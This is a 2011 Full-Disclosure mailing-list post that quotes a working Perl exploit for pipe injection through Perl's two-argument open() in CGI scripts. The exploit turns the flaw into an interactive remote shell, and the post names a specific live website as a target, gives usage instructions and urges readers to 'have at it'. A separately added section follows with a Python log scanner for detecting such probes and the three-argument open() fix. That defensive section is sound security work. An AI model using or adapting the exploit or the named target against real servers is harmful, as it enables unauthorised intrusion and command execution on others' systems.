Well shit. It did send twice. :( Now I look like a goof, haha.

On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker <[email protected]> wrote:
> This works off the perl pipe read bug, you can just input the first and
> second parts of the web address (with http:// included) and it'll drop you
> at a shell. When using cd you must use the absolute path because I was too
> lazy to do it the correct way. ;-). I know this is pretty easy stuff, it
> works off those vulns that can just be exploited with a web browser, but
> this gives you a shell. So have at it guys & gals! Had to resend because I
> got some message about my attachment being blocked. Not sure if it really
> was, though, I'll send again anyway. Hope this isn't spamming the list. =/
>
> Site:
> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File
> Usage: ./sublime.pl "http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=" "&desc=Stat+File"
>
> Should work on most perl cgi scripts that are vulnerable to | read bug.
> Please note, it's not a "real" shell, but almost everything works, except
> things that won't go in one instance like cd-ing and env vars, etc.
>
> Play nice!
>
> --oxagast
>
> [CODE]
>
> #!/usr/bin/perl
>
> # adaptive cgi shell by oxagast
>
> use LWP::Simple;
> $part1 = @ARGV[0]; $part2 = @ARGV[1];
> print "Making buffer...\n";
> for $bet (100..200) {
>     $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n";
> }
> print "Exploiting...\n";
> $id = get("$part1\|id\|$part2");
> $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/;
> print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n";
> $uid = $1;
> print "$uid\n";
> while (0 == 0) {
>     print "\$ ";
>     $cmd = <STDIN>;
>     chomp($cmd);
>     if ($cmd =~ m/cd (\/.*)/) {
>         $dir = $1;
>     }
>     if ($cmd eq "cd ..") {
>         $dir =~ s/(.*)\/.*/\/\1/;
>     }
>     if ($cmd eq "pwd") {
>         $dirjunk = $dir;
>         if ($dirjunk eq "//") {
>             $dirjunk = "/";
>         }
>     }
>     $dirjunk = "cd $dir\;$cmd";
>     $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr");
>     $cmdhex =~ s/(..)/\\\\x$1/g;
>     get("$part1\|echo -e $bettwo > /tmp/buff\|$part2");
>     $backjunk2 = get("$part1\|cat /tmp/buff\|$part2");
>     @backjunk = split("\n", $backjunk2);
>     get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2");
>     get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2");
>     $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2");
>     @backjunk_split = split("\n", $backjunk_as);
>     $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2");
>     $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m;
>     $thismanylines = $1 - 1;
>     for $junknum (0..scalar(@backjunk_split)) {
>         for $fuzz (10..100+$thismanylines) {
>             if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) {
>                 $middle = $1;
>                 @backjunk[$junknum] =~ m/(.*)\Q$middle\E/;
>                 @backjunk_split[$junknum] =~ s/$1//;
>                 @backjunk[$junknum] =~ m/\Q$middle\E(.*)/;
>                 @backjunk_split[$junknum] =~ s/$1//;
>                 print "$backjunk_split[$junknum]\n";
>             }
>         }
>     }
> }
>
> [/CODE]
>
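The "perl pipe read bug" the post relies on is Perl's two-argument `open(FH, $name)`: a filename taken from a query parameter that begins or ends with `|` is treated as a command to pipe to or from, so the parameter value runs as a shell command. From the defender's side, the tell-tale in web-server logs is a CGI request whose parameter value carries a pipe, encoded or not. The following is an added detection example, not part of the original post or its script; it assumes Common Log Format access lines, uses constructed sample log entries with a placeholder `/cgi-bin/edit.cgi` path, and classifies each pipe-carrying parameter by whether `open()` would interpret it as a command (leading or trailing `|`) or whether the pipe is merely interior.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (not taken from the post). Lines 1, 2 and 4
# carry pipe-wrapped values of the kind two-argument open() would execute
# (line 4 is double-encoded); line 3 is benign; line 5 has an interior pipe.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Oct/2011:18:58:01 +0000] "GET /cgi-bin/edit.cgi?filename=%7Cid%7C&desc=Stat+File HTTP/1.1" 200 512
203.0.113.5 - - [15/Oct/2011:18:58:02 +0000] "GET /cgi-bin/edit.cgi?filename=|cat%20/tmp/buff|&desc=Stat+File HTTP/1.1" 200 4096
198.51.100.7 - - [15/Oct/2011:18:59:10 +0000] "GET /cgi-bin/edit.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File HTTP/1.1" 200 2048
203.0.113.5 - - [15/Oct/2011:18:59:30 +0000] "GET /cgi-bin/edit.cgi?filename=%257Cuname%257C&desc=Stat+File HTTP/1.1" 200 64
198.51.100.9 - - [15/Oct/2011:19:00:00 +0000] "GET /cgi-bin/edit.cgi?filename=stats/x.htm&desc=a%7Cb HTTP/1.1" 200 2048
"""

# Common Log Format: client ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def classify_pipe(value):
    """Return how Perl's two-argument open() would treat this parameter value.

    'open-mode': value starts or ends with '|', so open(FH, $value) would run
                 it as a command instead of opening a file.
    'interior' : a '|' appears but not at either end; not executed by open()
                 itself, still worth surfacing as suspicious input.
    None       : no pipe character at all.
    """
    v = value.strip()          # open() ignores surrounding whitespace
    if "|" not in v:
        return None
    if v.startswith("|") or v.endswith("|"):
        return "open-mode"
    return "interior"


def scan_log(text):
    """Parse CLF lines and return one finding dict per pipe-carrying parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue               # not a CLF line; skip rather than guess
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl decodes once; a second unquote catches %257C-style
            # double encoding that some scanners use to slip past naive filters.
            decoded = unquote(value)
            kind = classify_pipe(decoded)
            if kind is not None:
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "path": parts.path,
                    "param": name,
                    "value": decoded,
                    "kind": kind,
                })
    return findings


def summarize(findings):
    """Count findings per classification, e.g. {'open-mode': 3, 'interior': 1}."""
    counts = {}
    for f in findings:
        counts[f["kind"]] = counts.get(f["kind"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} {h["path"]} {h["param"]}={h["value"]!r} [{h["kind"]}]')
    print(summarize(hits))
```

The fix on the application side is the three-argument form, `open(my $fh, '<', $filename)`, which never interprets the filename as a command, together with rejecting parameter values that contain `|` or escape the intended directory. The scanner above is meant to run over archived access logs to find whether a given CGI endpoint has already been probed this way.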
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
